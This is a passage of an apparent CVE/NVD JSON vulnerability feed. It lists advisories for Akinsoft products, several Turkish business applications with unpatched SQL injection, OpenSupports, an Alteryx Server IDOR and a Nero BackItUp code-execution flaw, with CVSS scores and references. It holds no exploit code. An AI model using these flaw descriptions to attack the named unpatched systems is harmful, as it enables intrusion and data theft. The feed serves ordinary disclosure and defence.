*","versionStartIncluding":"6.7","versionEndExcluding":"6.12.46","matchCriteriaId":"F7E2B332-E920-4CAC-B400-288602DB6F16"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.16.1","matchCriteriaId":"8B9C94BD-76DF-42B9-9A0B-04DACF7CBE8F"}]}]},{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*","matchCriteriaId":"FA6FEEC2-9F11-4643-8827-749718254FED"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"5.0","matchCriteriaId":"AA9D4F6E-9336-4026-B485-4227C861B356"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*","matchCriteriaId":"92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/19341d5c59e8c7e8528e40f8663e99d67810473c","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/41688d1fc5d163a6c2c0e95c0419e2cb31a44648","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/66da7cee78590259b400e51a70622ccd41da7bb2","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/7acfa07c585e3d7a64654d38f0a5c762877d0b9b","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/abad3d0bad72a52137e0c350c59542d75ae4f513","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/c1c74584b9b4043c52e41fec415226e582d266a3","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]},{"url":"https://cert-portal.siemens.com/productcert/html/ssa-032379.html","source":"0b142b55-0307-4c5a-b3c9-f314f3fb7c5e","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2024-12924","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-01T13:15:32.897","lastModified":"2026-06-01T13:16:25.447","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Akınsoft QR Menü allows Forceful Browsing, Phishing.\n\nThis issue affects QR Menü: from s1.05.05 before v1.05.12."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0202","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0202","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12925","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-01T13:15:33.100","lastModified":"2026-06-01T13:16:25.590","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Validation of Certificate with Host Mismatch vulnerability in Akınsoft QR Menü allows HTTP Response Splitting.\n\nThis issue affects QR Menü: from s1.05.05 before v1.05.12."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-297"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0202","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0202","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12972","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-02T12:15:34.327","lastModified":"2026-06-01T13:16:26.160","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft OctoCloud allows Cross-Site Scripting (XSS).\n\nThis issue affects OctoCloud: from s1.09.01 before v1.11.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0203","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0203","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12973","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-02T12:15:35.240","lastModified":"2026-06-01T13:16:26.267","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Origin Validation Error vulnerability in Akinsoft OctoCloud allows HTTP Response Splitting, CAPEC - 87 - Forceful Browsing.\n\nThis issue affects OctoCloud: from s1.09.01 before v1.11.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.2,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-346"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0203","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0203","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12974","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-02T14:15:33.170","lastModified":"2026-06-01T13:16:26.390","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft ProKuaför allows Cross-Site Scripting (XSS).\n\nThis issue affects ProKuaför: from s1.02.07 before v1.02.08."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0204","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0204","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13063","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T09:15:33.343","lastModified":"2026-06-01T13:16:26.500","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization Bypass Through User-Controlled Key vulnerability in Akinsoft MyRezzta allows Forceful Browsing.\n\nThis issue affects MyRezzta: from s2.02.02 before v2.05.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.1,"impactScore":4.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0205","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0205","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13064","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T09:15:33.567","lastModified":"2026-06-01T13:16:26.610","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft MyRezzta allows Cross-Site Scripting (XSS).\n\nThis issue affects MyRezzta: from s2.02.02 before v2.05.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0205","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0205","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13065","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T09:15:33.810","lastModified":"2026-06-01T13:16:26.710","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Enforcement of Behavioral Workflow, Uncontrolled Resource Consumption vulnerability in Akinsoft MyRezzta allows Input Data Manipulation, CAPEC - 125 - Flooding.\n\nThis issue affects MyRezzta: from s2.02.02 before v2.05.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-841"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0205","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0205","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13066","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T13:15:46.243","lastModified":"2026-06-01T13:16:26.810","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Restriction of Rendered UI Layers or Frames vulnerability in Akinsoft LimonDesk allows iFrame Overlay, CAPEC - 103 - Clickjacking.\n\nThis issue affects LimonDesk: from s1.02.14 before v1.02.17."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-1021"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0206","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0206","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13068","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T14:15:42.403","lastModified":"2026-06-01T13:16:26.937","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Origin Validation Error vulnerability in Akinsoft LimonDesk allows Forceful Browsing.\n\nThis issue affects LimonDesk: from s1.02.14 before v1.02.17."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-346"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0206","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0206","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13071","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-04T10:42:24.347","lastModified":"2026-06-01T13:16:27.077","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft e-Mutabakat allows Cross-Site Scripting (XSS).\n\nThis issue affects e-Mutabakat: from 2.02.05 before v2.02.06."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0207","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0207","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13073","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-04T10:42:25.387","lastModified":"2026-06-01T13:16:27.227","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft TaskPano allows Cross-Site Scripting (XSS).\n\nThis issue affects TaskPano: s1.06.04."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.2,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0208","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0208","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13149","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-16T15:15:42.533","lastModified":"2026-06-01T13:16:27.630","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), CWE - 200 - Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arma Store Armalife allows SQL Injection.\n\nThis issue affects Armalife: through 20250916. \n\nNOTE: The vendor did not inform about the completion of the fixing process within the specified time. The CVE will be updated when new information becomes available."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0258","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0258","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13174","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-16T15:15:42.707","lastModified":"2026-06-01T13:16:28.077","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in E1 Informatics Web Application allows SQL Injection.\n\nThis issue affects Web Application: through 20250916. \n\nNOTE: The vendor did not inform about the completion of the fixing process within the specified time. The CVE will be updated when new information becomes available."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0259","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0259","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13151","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-18T12:15:36.260","lastModified":"2026-06-01T13:16:27.857","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"CWE - 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ESBI Information and Telecommunication Industry and Trade Limited Company Auto Service Software allows SQL Injection.\n\nThis issue affects Auto Service Software: before v.2025.10.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0273","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0273","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13150","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-29T13:15:45.320","lastModified":"2026-06-01T13:16:27.743","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Fayton Software and Consulting Services fayton.Pro ERP allows SQL Injection.\n\nThis issue affects fayton.Pro ERP: through 20250929."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0304","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0304","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2025-10696","sourceIdentifier":"help@fluidattacks.com","published":"2025-10-03T21:15:33.503","lastModified":"2026-06-01T12:22:50.817","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"OpenSupports exposes an endpoint that allows the list of 'supervised users' for any account to be edited, but it does not validate whether the actor is the owner of that list. A Level 1 staff member can modify the supervision relationship of a third party (the target user), who can then view the tickets of the added 'supervised' users. This breaks the authorization model and filters the content of other users' tickets.This issue affects OpenSupports: 4.11.0."}],"metrics":{"cvssMetricV40":[{"source":"help@fluidattacks.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"help@fluidattacks.com","type":"Secondary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:opensupports:opensupports:4.11.0:*:*:*:*:*:*:*","matchCriteriaId":"79B3C4CE-1AEE-44B6-BDEC-726B28A99A89"}]}]}],"references":[{"url":"https://fluidattacks.com/advisories/stratovarius","source":"help@fluidattacks.com","tags":["Exploit","Third Party Advisory"]},{"url":"https://github.com/opensupports/opensupports","source":"help@fluidattacks.com","tags":["Product"]},{"url":"https://fluidattacks.com/advisories/stratovarius","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-63291","sourceIdentifier":"cve@mitre.org","published":"2025-11-14T19:16:01.163","lastModified":"2026-06-01T12:22:13.450","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"When processing API requests, the Alteryx server 2022.1.1.42654 and 2024.1 used MongoDB object IDs to uniquely identify the data being requested by the caller. The Alteryx server did not check whether the authenticated user had permission to access the specified MongoDB object ID. By specifying particlar MongoDB object IDs, callers could obtain records for other users without proper authorization. Records retrievable using this attack included administrative API keys and private studio api keys."}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-648"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:alteryx:alteryx_server:*:*:*:*:*:*:*:*","versionStartIncluding":"2022.1.0","versionEndIncluding":"2022.1.1.42654","matchCriteriaId":"CF563DE9-5380-4D51-AC09-8180C1A04553"}]}]}],"references":[{"url":"https://aleksazatezalo.medium.com/alteryx-server-idor-advisory-782e3013ee38","source":"cve@mitre.org","tags":["Exploit","Third Party Advisory"]},{"url":"https://help.alteryx.com/current/en/server/api-overview.html","source":"cve@mitre.org","tags":["Product"]},{"url":"https://help.alteryx.com/current/en/server/api-overview/alteryx-server-api-v3/server-api-configuration-and-authorization.html","source":"cve@mitre.org","tags":["Product"]}]}},{"cve":{"id":"CVE-2025-63680","sourceIdentifier":"cve@mitre.org","published":"2025-11-14T19:16:01.360","lastModified":"2026-06-01T12:22:07.410","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Nero BackItUp in the Nero Productline is vulnerable to a path parsing/UI rendering flaw (CWE-22) that, in combination with Windows ShellExecuteW fallback extension resolution, leads to arbitrary code execution when a user clicks a crafted entry. By creating a trailing-dot folder and placing a same-basename script, Nero BackItUp renders the file as a folder icon and then invokes ShellExecuteW, which executes the script via PATHEXT fallback 